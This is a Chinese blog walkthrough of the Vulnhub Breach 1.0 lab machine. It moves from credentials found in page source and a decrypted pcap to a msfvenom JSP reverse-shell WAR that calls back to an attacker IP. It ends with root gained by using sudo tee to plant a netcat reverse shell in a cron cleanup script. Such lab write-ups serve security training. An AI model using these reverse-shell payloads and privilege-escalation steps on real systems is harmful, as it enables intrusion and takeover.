Vulnhub-Breach 1.0

最新推荐文章于 2024-07-12 19:48:55 发布
最新推荐文章于 2024-07-12 19:48:55 发布
阅读量1k 收藏 10
点赞数 33
分类专栏: 靶场 文章标签: 安全 web安全 python 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52579508/article/details/140042162
版权

Breach 靶机固定IP
192.168.110.140

信息收集

namp 扫一下开了几个端口
nmap -sV -A -v 192.168.110.140
image.png
有一千多多个端口 开放 这很有可能迷惑 所使用的

这里就只要浏览器访问他的80端口网页试一下
image.png
给了一个这样的一个页面 ,我们要去找一些相关的信息
F12 看一下它的代码
image.png

base64解码

这里看出一一个base64 码
我们这里使用python 解一下码 是一个二次加密的base64
image.png
这像一个账号密码的 不管了先收集一下
pgibbons:damnitfeel g o o d t o b e a g a n g goodtobeagang goodtobeagangta
然后继续观察网页发现一个超链接 点进去观察
image.png
发现 是一个 佩内特罗德赛博咨询有限责任公司 的什么网页 ????
点击 Employee portal 就弹出一个cms 的网页

使用信息收集的base64解密登录CMS

image.png
需要账号密码 ??想到了刚才的base64 解密之后就是一个 账号密码了
看能 不能登上去看看
image.png
成功登上后台
看左边 发现三个红点好像是邮箱 ,不会是什么秘密把
前两个没有什么用说的是安全什么的
看最后一个 有两个线索点
一个是 在 http://192.168.110.140/.keystore 保存了一个东西
另外一个是让找到一个新的SSL 证书
下载包含SSL证书的密钥库keystore文件(keystore是存储公私密钥的一种文件格式)
image.png
点击View Account菜单进入界面,再依次点击页面的Content,会弹出一行链接Content SSL implementation test capture
image.png
介绍
我已经上传了我们红队重新制作的攻击的pcap文件。我不确定他们使用了什么诡计,但我无法读取文件。我尝试了C|EH研究中的每一个nmap开关,只是无法弄清楚。** **http://192.168.110.140/impresscms/_SSL_test_phase1.pcap他们告诉我别名,存储密码和密钥密码都设置为"tomcat"。这有用吗?有谁知道这是什么?我想我们现在被安全加密了吗?-彼得·皮尔斯我将在接下来的2天内钓鱼,无法访问电子邮件或电话。
有发现了papc文件 已经告诉了密码都是tomcat

从密钥库导出.p12证书,将keystore拷贝到D盘目录,导出名为:tomcatkeystore.p12的证书
keytool -importkeystore -srckeystore .\keystore -destkeystore d:\tomcatkeystore.p12 -deststoretype PKCS12 -srcalias tomcat
image.png

Wireshark抓包

将证书导入Wireshark

image.png
过滤http
image.png
http追踪流 找到一串 base64
image.png

第二个密码

解密
tomcat:Tt\5D8F(#!*u=G)4m7zB
好像又是一个账号密码
image.png

找到一个网站 但是打不开发不了数据 我们这里使用bp
image.png

Burp

成功访问
image.png

上传.war 包

登入
image.pngTomcat后台getshell
这里需要上传.war 包
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.110.128 lport=8989 -f war -o exp.war

Payload size: 1092 bytes
Final size of war file: 1092 bytes
Saved as: exp.war

use exploit/multi/handler

image.png
上传
image.png
访问
image.png

msf反弹shell >>>提权

image.png
反弹成功后,输入命令python -c 'import pty;pty.spawn(“/bin/bash”)'得到bash模式,
最后得到shell,并尝试登录mysql
image.png

查找数据库
show databases;
image.png
use mysql ;
查看所有表
image.png
找到用户 表 密码
转一下md5
image.png
解码
image.png
密码: thelaststraw
登录
image.png
看到历史命令su提权到了blumbergh用户。
需要找到blumbergh用户的密码。
image.png
得到六张图片
image.png
第一张图片
查看字符串信息
有两个很像密码试一下
strings bill.png
image.png
登录试一下
image.png
成功登录
历史记录
image.png
找到tidyup.sh
image.png
这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的 马 总是被删除,需要重新上传。查看tidyup.sh的权限,对该脚本没有写入权限,只有root可以

tidyup.sh文件只有root可写,而能够以root权限运行tee命令,那么用tee命令写tidyup.sh:先将反弹shell命令写入shell.txt文件,nc反弹命
image.png
nc监听

提权成功

image.png

小龙_(R0 Team)
关注
  • 33
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub】---Breach-1.0靶机
qq_43168364的博客
08-22 1015
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:Breach-1.0靶机(192.168.110.140) 攻击机:kali Linux(192.168.15.129) 物理机IP:192.168.110.220 相关配置 由于该靶机用的是静态的ip,我们要访问的话需要改变主机的IP和他处于同一个网端,为了让物理机还可以访问互联网,我们给物理机添加上两个网卡 这样就OK了 二、信息收集 主机发现 该靶机已知IP地址无需主机发现 端
Breach-1.0.zip
08-21
Breach-1.0.zip
vulnhub-Breach_1.0
HEAVEN569的博客
06-28 1179
vulnhub-Breach_1.0内网主机渗透测试
VulnHub渗透测试实战靶场 - Breach 1.0
LYJ20010728的博客
08-04 1100
Vulnhub - Breach-1.0环境下载Breach-1.0靶机搭建渗透过程信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Breach-1.0靶机搭建 将下载好的靶机环境,用VMware导入即可使用 VMware虚拟机配置有静态IP地址:192.168.110.140,需要将虚拟机网卡设置为host-only方式 攻击机IP:192.168.110.128 靶机IP:192.168.110.140 渗透过程 信息搜集 使用arp-scan来检测我们的目
Vulnhub靶场Breach1.0详解
m0_65712192的博客
02-14 1222
Vulnhub靶场Breach1.0详解
Vulnhub之Breach1.0靶场练习
m0_46371267的博客
02-22 3849
靶机信息 下载链接: https://download.vulnhub.com/breach/Breach-1.0.zip 环境配置 1.解压后用vmware打开,这里是我已经安装好的,未安装的只有ova和readme.txt两个文件 Pasted image 20220221090234.png 2.靶机默认使用仅主机模式,ip为192.168.110.140,所以需要将vmnet1的ip设置在192.168.110.0此网段。 Pasted image 20220221090526.png Pasted
vulnhub breach1.0
dfhjlll的博客
02-11 443
下载breach 1.0,直接打开 breach 1.0的ip是192.168.110.140,需要将虚拟机网卡设置为nat 物理机上设置网络vmnet的ipv4地址为192.168.110.220
Vulnhub靶场渗透-Breach1.0
paidx0
09-08 1531
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的一个靶场平台,大部分环境都是虚拟机镜像文件,预先设计各种漏洞 需要使用VMware或VirtualBox 运行,每个镜像都有破解的目标,从启动虚拟机到获取系统的 root 权限和查看 flag https://www.vulnhub.com/ Breach1.0靶机信息 breach1.0 是一个难度初级到中级的Boot2Root/CTF挑战 静态ip(192.168.110.140),配置环境到同一个网段,我用的kali (192.168.110.
Vulnhub系列】Breach1.0
大方子
04-04 595
https://note.youdao.com/s/4hswPJul
Vulnhub 渗透练习(一)—— Breach 1.0
shinygod的博客
02-14 578
跟着大佬们的步伐结合自己的思考,学会了很多东西,很多平时不曾注意到的点,也稍微知道了一些渗透的简要步骤。
SCP-Contaiment-Breach
03-20
SCP-Contaiment-Breach
email-breach
04-01
电子邮件违规 包含我在进行渗透测试时个人丢弃的所有电子邮件 我已删除所有在转储中多次出现的重复电子邮件 随时欢迎您添加更多电子邮件并扩展列表。 在将重复项添加到此列表之前,请确保将其删除。...
一起打靶-Breach-2-final2.1.xss上线
09-28
"一起打靶-Breach-2-final2.1.xss上线" 知识点1:靶机配置 靶机 Breach 2.0 配置了静态 IP(192.168.110.151),用户需要配置主机 only 适配器来访问该子网。 知识点2:生产环境模拟 该挑战试图展示一个真实世界的...
hull-breach:由Godot 3.0.2制成的2D街机射击游戏,具有水下设置
05-08
压缩包文件名为“hull-breach-master”,表明这是游戏的源代码仓库或者开发版本。通常,这个文件夹会包含项目文件、资源、脚本、配置文件等。开发者或学习者可以通过查看这些文件,了解游戏的具体实现方式,学习如何...
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 1325
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
安全防御-用户认证综合实验
最新发布
weixin_69863399的博客
07-12 395
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
车载视频监控管理方案:无人驾驶出租车安全出行的保障
TSINGSEE青犀视频官方技术博客
07-12 755
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
网络设备安全
weixin_48579910的博客
07-11 935
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
putty WARNING - POTENTIAL SECURITY BREACH!
07-27
回答: 当您在使用PuTTY时,如果看到"WARNING - POTENTIAL SECURITY BREACH!"的警告信息,这可能是由于几种原因引起的。首先,这可能是因为您连接的服务器使用了较低的加密算法,而PuTTY检测到这可能存在安全风险。这是为了防止降级攻击。\[2\]其次,这可能是因为您连接的服务器返回了未分配的公共IP地址,这些地址通常可以被安全地阻止,因为它们不应该处于活动使用状态。\[1\]最后,PuTTY在某些平台上可能会在处理线条绘制字符时出现问题。\[3\]如果您遇到这个警告信息,建议您仔细检查服务器的安全性,并确保使用较高级别的加密算法来保护您的连接。 #### 引用[.reference_title] - *1* *3* [SG-1000使用指南](https://blog.csdn.net/weixin_33991727/article/details/89872893)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [PuTTY用户手册(十四)](https://blog.csdn.net/le_17_4_6/article/details/86522290)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值